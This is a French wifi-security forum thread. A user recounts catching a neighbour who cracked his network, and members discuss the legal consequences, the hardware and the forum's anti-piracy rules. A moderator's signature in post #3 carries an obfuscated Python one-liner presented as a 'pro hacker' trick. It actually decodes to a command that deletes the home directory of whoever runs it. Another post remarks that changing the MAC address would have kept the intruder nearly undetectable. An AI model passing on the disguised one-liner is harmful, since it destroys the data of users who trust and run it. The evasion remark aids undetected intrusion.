Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 07-08-2013 11:36:59

tchill
Nouveau membre

Cracké les reseau wifi peut être dangeureux .....

Voila j'ai été victime d'un voisin qui me piratais mon wifi je l'ai remarqué j'ai changé mes paramètre wifi, clef wap2 , ssid masqué, désactivé code pin wps, DHCP restreint avec adresse mac reservé .

Ensuite j'ai installé une ancienne box avec mes anciens id reseau avec un pc avec achiwa qui ma renseigné toute ses allez et venu sur le réseau c'est ainsi que j'ai chopé sont mac qui correspond à du materiel alpha celui qu'il présente sur sont compte Facebook et oui on est pas ami mais pas de bol pour lui on avais un ami en commun et j'ai tous vu puisqu'il partage aux amis de ses amis il a également fait des captures de ses exploits....

J'ai également repris sont mac avec inssider quand il faisait des points d'accès wifi d'ailleurs sont truc de merde de 2w qui devrais pas dépasser les 100mw légal était  plus puissant que ma box qui était à 2 mètres de moi (mesure faite avec inssider) sachant qu'on est dans deux maison individuels de 3 étages éloigné de 20mètres ...

Bilan ??

La gendarmerie est passé le voir tous à été saisie il risque jusqu'à 50000€ d'amende il est dans la merde !!!

Alors pour ceux qui sont mal attentionné !!

Pensez au jour ou vous tomberez sur la personne qui faillais pas pirater !!!!

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-08-2013 15:50:28

Furyo
Membre Irremplaçable
Site Web

Re : Cracké les reseau wifi peut être dangeureux .....

Bien fait pour lui!!!

J'espere que tu as déposé une plainte pour prejudice moral en plus de ce qui lui est reproché !!!

Soit dit en passant, c'est vraiment un gros noob de laisser sa carte avec sa MAC standard lors de l'intrusion du reseau!! On voit tout de suite que si il avait été malin, ca aurrait été beaucoup plus difficile de l'attrapper car il aurrait pu être quasiment indetectable wink

Un de moins...

Suivant...

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 07-08-2013 17:23:49

spawn
Modérateur

\o/

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 07-08-2013 20:54:43

koala
Membre d'honneur
Lieu : In the sky

Tous a été saisie? ben dis donc...

Pour l'amende il paiera une broutille sans doute, la peine que tu indique est la peine maximum requise de plus si son casier et vierge il aura vraiment pas grand chose.. a part devoir tout se racheter tongue

Il a pas été malin de s'en vanter sur FB et encore moins malin non plus de ne pas avoir été plus discret sur le réseau.

#5 08-08-2013 22:10:56

M1ck3y
Administrateur
Lieu : Lost in the darkness

Ce que je ne comprend pas, c'est que ça ne colle pas avec ce que tu nous a posté ici: Adresse mac d'un awus036h ???. La semaine dernière tu possédais une Awus036H, et plus maintenant?

Et puis tu parles de matériel de merde, mais n'importe quelle carte Wifi qui va émettre à 100 mW sera plus puissante qu'une box FAI, les box ont généralement des puissances d'émission très faibles. Ce n'est pas le matériel qui pose problème, dans le cas d'une Awus036H le driver va calibrer la puissance d'émission automatiquement en fonction du pays, d'ailleurs ce n'est pas la puissance d'émission qui fait la qualité de la carte, mais la sensibilité. Après, si le propriétaire de ce matériel va trafiquer le driver pour augmenter le Tx power, c'est de sa responsabilité. C'est un peu comme si un gars provoque un accident parce qu'il roule à 300 Kms/h sur route ouverte avec sa Porsche. Ce n'est pas la Porsche de "merde" qui va provoquer l'accident, c'est l'utilisation inadaptée qui en est faite par son propriétaire... Là ce n'est pas une carte Wifi qui a piraté ton réseau, ni une antenne ni meme un ordinateur, mais bien une personne.

Enfin quoi qu'il en soit, si tu as pris soin de lire notre règlement alors tu sais déja que personne ici n'approuve les comportements de ce type, et que le but du forum est de rassembler une communauté de passionnés de pentest sur leur propre réseau, ceux qui veulent aller cracker le réseau du voisin sont bannis de façon systématique chez nous.

#6 01-09-2013 18:55:59

tchill
Nouveau membre

Bonjour ,

A Furyo

En réponse non pas de plainte pour préjudice morale pour le moment, on verra la suite de l'affaire, il a pas été discret effectivement j'ai un beau dossier sur lui....

A koala

Pour l'amende??

Elle m'importe peu descente de gendarmerie devant tous le monde, saisie , toute la rue au courant les regards de travers de tous les voisins va falloir être solide mentalement .... Peu être d'autre voisin serons moins sympas...

A M1ck3y

Le post désolé un besoin pour mes recherches je ne possède pas se matériel je pensais avoir plus de réponse en abordant la chose de cette manière désolé .

Pour la puissance bridé du drivers de la carte wifi quand on est sur backtrack et se genre de logiciel se n'est qu'un détail on est d'accord... (d'ailleurs les puissance d'émissions mesuré de cette carte à partir de ma maison le démontre également avec inssider )

La sensibilité de cette carte ?? Elle est également  remarquable n'est ce pas ? Est l'orientation du matériel reste quand même clair bien que la mauvaise utilisation ne dépend que de l'utilisateur on est d'accord:

-----------------------------------------
Sécurité informatique, Wifi, Backtrack & Aircrack-ng

Parfaitement compatible avec les modes monitor et injection grace à son chipset Realtek RTL8187L, l'Awus036h est rapidement devenue la carte la plus populaire auprès des amateurs de wardriving et autres passionnés de sécurité Wifi. La possibilité d'y brancher n'importe quel type d'antenne grace à son port RP-SMA, la puissance d'émission élevée couplée à une sensibilité inégalée sont les clés de cette réussite, l'Alfa Network Awus036h est définitivement indispensable pour tous les passionnés de sécurité et de Wifi.

----------------------------------

Pour le règlement oui je l'avais bien lu est vu que vous n'approuviez pas se genre de comportement je vous en félicite d'ailleurs !!!  wink

Voila tous sa pour vous dire que quand on tape sur Google amende piratage wifi on sors aucune réponse clair mais que pour piratage réseau wifi une vague de tuto rapplique, la vie des gens reste privé et ne regarde personne d'autres cette intrusions dans ma vie privé est une atteinte à mes droit civique et je me sent comme après un cambriolage...

La je peu vous dire qu'il y en a un qui va passer des mauvaise nuit et un post comme le miens est plus que nécessaire pour mettre les pendules à l'heure de certain malhonnête !!!

Il n'y a pas que des victimes "noob"  alors il ne faut pas oubliez de respectez  les droits civiques des autres et demandez vous comment vous vous sentiriez si c'est vous qui était victime d'intrusion et d'espionnage de votre vie privé??

Dernière modification par tchill (01-09-2013 19:12:18)

#7 01-09-2013 21:33:06

Furyo
Membre Irremplaçable
Site Web

tchill a écrit :

Bonjour ,

A Furyo

En réponse non pas de plainte pour préjudice morale pour le moment, on verra la suite de l'affaire, il a pas été discret effectivement j'ai un beau dossier sur lui....

A koala

Pour l'amende??

Elle m'importe peu descente de gendarmerie devant tous le monde, saisie , toute la rue au courant les regards de travers de tous les voisins va falloir être solide mentalement .... Peu être d'autre voisin serons moins sympas...

A M1ck3y

Le post désolé un besoin pour mes recherches je ne possède pas se matériel je pensais avoir plus de réponse en abordant la chose de cette manière désolé .

Pour la puissance bridé du drivers de la carte wifi quand on est sur backtrack et se genre de logiciel se n'est qu'un détail on est d'accord... (d'ailleurs les puissance d'émissions mesuré de cette carte à partir de ma maison le démontre également avec inssider )

La sensibilité de cette carte ?? Elle est également  remarquable n'est ce pas ? Est l'orientation du matériel reste quand même clair bien que la mauvaise utilisation ne dépend que de l'utilisateur on est d'accord:

-----------------------------------------
Sécurité informatique, Wifi, Backtrack & Aircrack-ng

Parfaitement compatible avec les modes monitor et injection grace à son chipset Realtek RTL8187L, l'Awus036h est rapidement devenue la carte la plus populaire auprès des amateurs de wardriving et autres passionnés de sécurité Wifi. La possibilité d'y brancher n'importe quel type d'antenne grace à son port RP-SMA, la puissance d'émission élevée couplée à une sensibilité inégalée sont les clés de cette réussite, l'Alfa Network Awus036h est définitivement indispensable pour tous les passionnés de sécurité et de Wifi.

----------------------------------

Pour le règlement oui je l'avais bien lu est vu que vous n'approuviez pas se genre de comportement je vous en félicite d'ailleurs !!!  wink

Voila tous sa pour vous dire que quand on tape sur Google amende piratage wifi on sors aucune réponse clair mais que pour piratage réseau wifi une vague de tuto rapplique, la vie des gens reste privé et ne regarde personne d'autres cette intrusions dans ma vie privé est une atteinte à mes droit civique et je me sent comme après un cambriolage...

La je peu vous dire qu'il y en a un qui va passer des mauvaise nuit et un post comme le miens est plus que nécessaire pour mettre les pendules à l'heure de certain malhonnête !!!

Il n'y a pas que des victimes "noob"  alors il ne faut pas oubliez de respectez  les droits civiques des autres et demandez vous comment vous vous sentiriez si c'est vous qui était victime d'intrusion et d'espionnage de votre vie privé??

Si ce n'est que faire valoir tes droits et les faire reconnaître devant le tribunal compétent, je t'invite à invoquer le 1382 du code civil wink

http://www.legifrance.gouv.fr/affichCod … 0006070721

Et faire estimer le prejudice que tu as subit par un expert...

Piratage de ta connexion et intrusion dans ta vie privé ainsi que les incidences et les repercussions morales financières etc...

1/ la somme sera estimée et toi ou ton avocat l'ajoute aux pièces du dossier..
2/ tu demontreras sa volontée de nuire et le(s) prejudices subi(s).. Repercussions..

Perso, je le defonce le type "jusqu'à l'os" JURIDIQUEMENT, si j'étais toi ...  wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#8 02-09-2013 09:15:35

tchill
Nouveau membre

Merci pour les infos et ton soutiens je dois également contacter ma protection juridique pour voir si il prenne en charge, moralement je ne pouvais laisser passer sa je ne sais pas à quel niveau il a pénétré mon réseau ... Donnée partagé sa c'est sur , cookie compte mail Facebook eBay ?? Et le pire Webcam???

Je pense qu'il a juste cracker le wifi et forcement eu accès au données confidentiels mais rien de plus sa semble être un noob un suiveur de tuto qu'est ce que vous en pensez ???

En plus sa viens d'un voisin qui est juste à coté de chez moi... c'est minable ...

Dernière modification par tchill (02-09-2013 09:16:00)

#9 02-09-2013 11:01:20

Furyo
Membre Irremplaçable
Site Web

tchill a écrit :

Merci pour les infos et ton soutiens je dois également contacter ma protection juridique pour voir si il prenne en charge, moralement je ne pouvais laisser passer sa je ne sais pas à quel niveau il a pénétré mon réseau ... Donnée partagé sa c'est sur , cookie compte mail Facebook eBay ?? Et le pire Webcam???

Je pense qu'il a juste cracker le wifi et forcement eu accès au données confidentiels mais rien de plus sa semble être un noob un suiveur de tuto qu'est ce que vous en pensez ???

En plus sa viens d'un voisin qui est juste à coté de chez moi... c'est minable ...

L'enquête t'en dira plus, enfin, je l'espère wink

387003.jpg

#10 02-09-2013 11:24:05

koala
Membre d'honneur

Je suis contre le piratage d'autrui mais je vous trouve un peu dur quand meme.C'est peut-etre juste un type qui avait besoin d'internet pas un "hackeur expérimenté" quel intéret d'aller choper ton FB? si tu n'a pas un statut de chef d'entreprise ou autre l'enjeu est moindre...

Je n'incite pas au piratage (sauf si c'est entre pote et que chacun s'y connais ça peut-etre sympa de faire une soirée pentest ensemble smile ) mais quand on regarde le prix exorbitant des connexion internet et le cout de la vie actuel on peut s'apercevoir que des gens ne peuvent pas se payer la connexion, ce n'est qu'un revers malsain de la société.Je pense que si cette personne avait pu se payer internet elle aurait fait (attention je prends pas sa défense) je pense que les vrai coupable dans tout sa ce sont plus la société etles multinationales qu'autres chose.

#11 02-09-2013 11:38:23

Furyo
Membre Irremplaçable
Site Web

koala a écrit :

Je suis contre le piratage d'autrui mais je vous trouve un peu dur quand meme.C'est peut-etre juste un type qui avait besoin d'internet pas un "hackeur expérimenté" quel intéret d'aller choper ton FB? si tu n'a pas un statut de chef d'entreprise ou autre l'enjeu est moindre...

Je n'incite pas au piratage (sauf si c'est entre pote et que chacun s'y connais ça peut-etre sympa de faire une soirée pentest ensemble smile ) mais quand on regarde le prix exorbitant des connexion internet et le cout de la vie actuel on peut s'apercevoir que des gens ne peuvent pas se payer la connexion, ce n'est qu'un revers malsain de la société.Je pense que si cette personne avait pu se payer internet elle aurait fait (attention je prends pas sa défense) je pense que les vrai coupable dans tout sa ce sont plus la société etles multinationales qu'autres chose.

Je suis totalement d'accord avec toi Koala wink

Il y a d'un coté le pentest qu'on fait ensemble (entre potes et pour s'amuser) ...

Mais l'intrusion dans un reseau relève de la même chose qu'un cambriolage... Un peu comme ci le gars rentre chez toi et regarde partout, fouille, etc...

Sachant qu'aujourd'hui sur le net, des identifiants SFR Wifi FON ou Publique ou encore ceux de FreeWifi sont disponible et renouvellés chaque jour sur le net donc l'argument du coup actuel de la vie et du prix de la connexion, j'y crois plus trop... De plus, les lignes mobiles permettent aussi un acces au net et mieux encore pour certains car ils peuvent partager la connexion sous forme de Hotspot wink

Après ce qui a été fait sur son reseau, seul les enqueteurs pourront le dire si une enquête approfondie est mené (ce que je doute malheureusement car il n'y a pas eu d'homicide ou de faits assez grave pour lancer ce genre de mesures (en tout cas, c'est ce que dira un Proc wink )

wink

387003.jpg

#12 02-09-2013 12:53:00

tchill
Nouveau membre

A koala :

Dur non la discussion à échoué .

Quel intérêt mon fb ou autre ?

Quel intérêt a le voyeurisme ?

Ne sous estime pas les mauvais penchant de certain .

Pour l'accès internet ?

Il dispose d'une ligne 100mo !!

Alors d'après toi qu'est ce qu'il est venu faire chez moi ?

Internet ?

Ou fb ou autre  ?

Donne moi ton avis s'il te plait ?

A Furyo :

Je ne compte pas le démolire pour le moment mais je veux savoir qu'est ce qu'il a fait chez moi.

#13 02-09-2013 13:58:19

koala
Membre d'honneur

Donne moi ton avis s'il te plait ?

Je peux pas m'exprimer la dessus je ne connais pas ses intentions mais je suis curieux de savoir la suite par contre smile et savoir ce qu'il a fait chez toi comme tu dis et le plus intéressant dans tout ça.

#14 04-09-2013 22:07:09

M1ck3y
Administrateur

tchill a écrit :

Est l'orientation du matériel reste quand même clair bien que la mauvaise utilisation ne dépend que de l'utilisateur on est d'accord

Non pas du tout, en fait les caractéristiques de ce type de matériel font que c'est une carte populaire aussi bien auprès des pentesters que des campingcaristes ou autres utilisateurs nomades par exemple. Le matériel en lui meme n'a pas d'"orientation" particulière, juste certaines qualités radio qui permettent d'obtenir de meilleurs résultats qu'avec du matériel standard, et ce quelle que soit l'utilisation qui en est faite.

Mais nous sommes bien d'accord sur le fait que la mauvaise utilisation ne dépend que de l'utilisateur, et comme tu as pu le voir ici nous ne cautionnons pas les comportements de ce type, c'est important de le souligner.

#15 05-11-2013 15:04:32

koala
Membre d'honneur

Coucou smile

Quel est la suite de l'histoire? smile il a eu une ammende ? du surcis ? big_smile

#16 05-11-2013 17:45:46

FFOO31
Membre d'Or

à mon avis et si l'administrateur est d'accord, il faut sensibiliser les utilisateurs du risque subit par piratage et le vol d'informations des tièrs personnes, et ce par la création d'un topic ou sujet bien affiché dans la page acceuil, ce forum n'est pas un site de hack, et puis le titre de ce site induit des gens en erreur "crack-wifi".

#17 05-11-2013 21:56:27

koala
Membre d'honneur

On peut pas etre responsable des agissements des gens, on est un forum de passionés avant tout, si les gens se servent des tutos et de tout ce qu'il y a sur ce site pour faire de l'illégale (et il y a surement des gens qui le font je dis pas le contraire) on peut rien y faire, c'est leur problème leur éthique...

De toute manière on voit vite la différence entre un script kiddies et un passioné, le passioné reste sur le forum car il le trouve a sa juste valeur avec ce qu'il recherche et avec la communauté du forum en question.De par la meme occasion il participe a des projets, ou aide les autres membres si il sent que ces derniers sont la pour comprendre et non faire du copié collé.Le nom du forum et très bien et je vois pas pourquoi on devrait en changé pour quelque c** qui s'amusent a ce qu'il ne devrait pas.De plus on a quand meme une discipline qui banni les membres douteux et ceux qui se vante carrément d'avoir piraté un réseau en demandant de l'aide car son propriétaire s'est aperçu de la supercherie.

Pour la sensibilisation il y a déga tout ce qu'il faut sur ce forum et après ça dépend surtout quel type de personne rentre sur le forum.Le genre qui apprendre comprendre et avertir ses potes d'una mauvaise configuration ou celui qui va apprendre a l'arrache et s'empresse de tester ça sur un lambda.

Voila mon avis.

#18 05-11-2013 23:16:04

M1ck3y
Administrateur

Paler de sensibilisation, c'est montrer que tu n'as pas pris le temps de lire notre règlement lors de ton inscription sur le forum. Notre politique à ce sujet est parfaitement claire, et tous ceux qui ont montré au travers de leurs posts des intentions douteuses en ont fait les frais.

#19 06-11-2013 13:15:52

FFOO31
Membre d'Or

un rappel est gratuit et utile

#20 06-11-2013 13:52:31

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Lire est aussi gratuit et si on doit faire un rappel pour chaque membre qui s'inscrit on ne s'en sort plus
Personnellement je revendique sans problèmes les mots "hack" et "crack", c'est une grossière erreur que de les assimiler et réduire à de simples activités illégales cherchant le profit monétaire et nuire à son prochain et c'est faire preuve d'un manque total de connaissances sur le sujet.
Un simple lecture d'un article sur  wikipedia suffit amplement pour saisir la nature et l'histoire de ses termes et ce qu'ils signifient vraiment.
Il suffit de lire et participer dans le forum pour s'en rendre compte. wink

#21 06-11-2013 17:38:11

FFOO31
Membre d'Or

merci kcdtv, le mot "monétaire" m'a touché lol

Annonce